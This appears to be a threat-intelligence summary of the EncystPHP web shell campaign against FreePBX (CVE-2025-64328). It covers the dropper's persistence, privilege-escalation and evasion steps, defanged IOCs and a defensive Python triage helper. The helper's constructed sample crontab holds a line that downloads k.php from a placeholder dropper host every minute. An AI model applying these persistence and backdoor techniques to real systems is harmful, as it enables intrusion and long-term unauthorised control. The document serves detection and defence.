FortiGuard Labs has identified and analyzed a sophisticated PHP web shell campaign that targets FreePBX systems. The malware, named EncystPHP, was deployed by exploiting the FreePBX Endpoint Manager vulnerability CVE-2025-64328, allowing attackers remote command execution, long-term persistence, and deep administrative control of compromised systems.
Target and Impact
- Affected Platforms: FreePBX Endpoint Manager versions v17.0.2.36 – v17.0.3.
- Severity: High
- Impact: Remote attackers can fully compromise vulnerable systems and maintain long-term privileged access.
- Affected Users: Any organization operating unpatched FreePBX environments.
This campaign is linked to the threat actor group INJ3CTOR3, previously observed targeting legacy PBX systems via different vulnerabilities.
Initial Intrusion and Delivery
EncystPHP was delivered through a post-authentication command-injection exploit against the FreePBX administrative interface (CVE-2025-64328). Attack traffic originated from Brazil, targeting an organization in India that provides cloud and telephony services. The attackers downloaded the initial dropper from 45[.]234[.]176[.]202, associated with a domain posing as a VoIP management site.
Once active, the malware positioned itself within the victim system via file “c”, which served as the main dropper for subsequent activity.
Malware Behavior and System Impact
1. System Modification and Initial Actions
Upon execution, the EncystPHP dropper:
- Changes permissions on existing FreePBX PHP files (ajax.php, model.php) to 000, making them unreadable and non-executable.
- Gathers database configuration data from /etc/freepbx.conf.
- Deletes cron jobs and numerous FreePBX user accounts (e.g., “ampuser”, “svc_freepbx”, “emoadmin”, “FreePBX_setup”).
- Searches for and deletes other web shells and PHP files containing known malicious strings, reducing competition for control.
2. Privilege Escalation and Account Compromise
To solidify control over the system:
- A root-level user newfpbx is created with UID 0 and a known encrypted password.
- Multiple existing user passwords are reset to a common password.
- The attacker injects an SSH public key and ensures SSH port 22 remains open.
This allows the attacker to execute shell commands and maintain remote shell access.
3. Secondary Dropper and Web Shell Deployment
EncystPHP deploys a second dropper named k.php, which:
- Carries another Base64-encoded PHP web shell.
- Decodes and writes this payload to disk, commonly as ajax.php (imitating legitimate FreePBX files).
- Creates directories under /var/www/html/ (e.g., phones/, freepbxphones/, rest_phones/) to distribute multiple instances of the web shell, improving resilience against removal.
- Forges timestamps on these files to match legitimate ones, masking malicious modifications.
EncystPHP Web Shell Functionality
The web shell decoded by the dropper offers an interactive interface titled “Ask Master”. Key characteristics include:
- Authentication: A plaintext password is hashed with MD5 and checked against a hard-coded hash within the payload.
- Post-Authentication Operations:
- File system enumeration
- Process inspection
- Querying of active Asterisk channels
- Listing of SIP peers
- Retrieval of FreePBX/Elastix configuration files
- The shell has sufficient privileges for arbitrary command execution and can abuse the PBX environment to generate outbound calls or other telephony activities.
Persistence Mechanisms
EncystPHP implements persistence in four coordinated stages:
- Crontab Installations: The initial dropper (c) installs cron jobs that download k.php every minute, saving it under benign-looking binary names.
- Persistence Shell Script (test.sh): Decodes and writes a PHP component, license.php, which itself downloads other droppers and sets up more cron jobs.
- Repetitive Downloader: A cron job installs a downloader saved under a different benign-looking binary name; it echoes removal commands without executing them, mimicking a cleanup.
- License Component: A Base64-encoded PHP file repeatedly fetches droppers and ensures execution while disabling error reporting and cleaning logs to hide forensic evidence.
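Added host-triage helper (not code from the FortiGuard report or from the malware) that checks text snapshots of a suspect FreePBX host for the account, cron and web-root artifacts described under System Modification, Privilege Escalation and Persistence Mechanisms above; the sample snapshots, the binary name ps2 and the DROPPER-HOST URL placeholder are constructed.

```python
import re
# Constructed snapshots standing in for `getent passwd`, `crontab -l` and
# `find /var/www/html -name '*.php' -printf '%m %p\n'` output on a suspect host.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
asterisk:x:1000:1000::/var/lib/asterisk:/sbin/nologin
newfpbx:x:0:0::/root:/bin/bash
"""
SAMPLE_CRON = """# constructed sample crontab
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * wget -q -O /usr/bin/ps2 http://DROPPER-HOST/new/k.php
"""
SAMPLE_FIND = """644 /var/www/html/admin/config.php
0 /var/www/html/admin/ajax.php
644 /var/www/html/phones/ajax.php
"""
# Directories the campaign creates under the web root to stage shell copies.
STAGING_DIRS = ("/var/www/html/phones/", "/var/www/html/freepbxphones/",
                "/var/www/html/rest_phones/")
REMOTE_FETCH = re.compile(r"\b(?:curl|wget)\b.*https?://")

def extra_uid0_accounts(passwd_text):
    """Accounts with UID 0 other than root (the dropper adds 'newfpbx')."""
    found = []
    for line in passwd_text.splitlines():
        f = line.split(":")
        if len(f) >= 3 and f[2] == "0" and f[0] != "root":
            found.append(f[0])
    return found

def every_minute_fetch_jobs(crontab_text):
    """Cron lines that run every minute and pull a URL (the k.php re-download)."""
    hits = []
    for line in crontab_text.splitlines():
        f = line.strip().split(None, 5)
        if len(f) == 6 and f[:5] == ["*"] * 5 and REMOTE_FETCH.search(f[5]):
            hits.append(line.strip())
    return hits

def suspicious_webroot_entries(find_output):
    """PHP files chmod'ed to 000 (neutralised originals) or placed in the
    staging directories the campaign creates under /var/www/html/."""
    hits = []
    for line in find_output.splitlines():
        mode, _, path = line.partition(" ")
        if mode in ("0", "000"):
            hits.append("mode 000: " + path)
        elif path.startswith(STAGING_DIRS):
            hits.append("staged copy: " + path)
    return hits
```

On a live host, feed the three functions the real command output instead of the constructed samples; any non-empty result warrants treating the system as fully compromised, as the report advises.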
Indicators of Compromise (IOCs)
URLs
hxxp://45[.]234[.]176[.]202/new/c
hxxp://45[.]234[.]176[.]202/new/k.php
Hosts
45[.]234[.]176[.]202
187[.]108[.]1[.]130
Files
MITRE ATT&CK Mapping
FortiGuard’s analysis maps this campaign to multiple ATT&CK techniques, including:
- Initial Access: Exploitation of public-facing applications
- Execution: Unix shell command execution
- Persistence: Cron jobs, web shell deployment
- Privilege Escalation: Local account creation and exploitation
- Credential Access: Database credential collection
- Defense Evasion: Deleting logs and modifying permissions
- Command & Control: Repeated remote dropper downloads
- Impact: Abuse of PBX telephony functions
Conclusion & Mitigation
The EncystPHP campaign highlights how unpatched PBX systems are prime targets for advanced web shells that evade detection and retain long-term control. Combining stealthy persistence, privilege escalation, and administrative access, this web shell enables attackers to fully compromise FreePBX environments.
Organizations should treat exploitation of CVE-2025-64328 as a full compromise, perform immediate remediation, and strengthen security monitoring and hardening to mitigate risks.
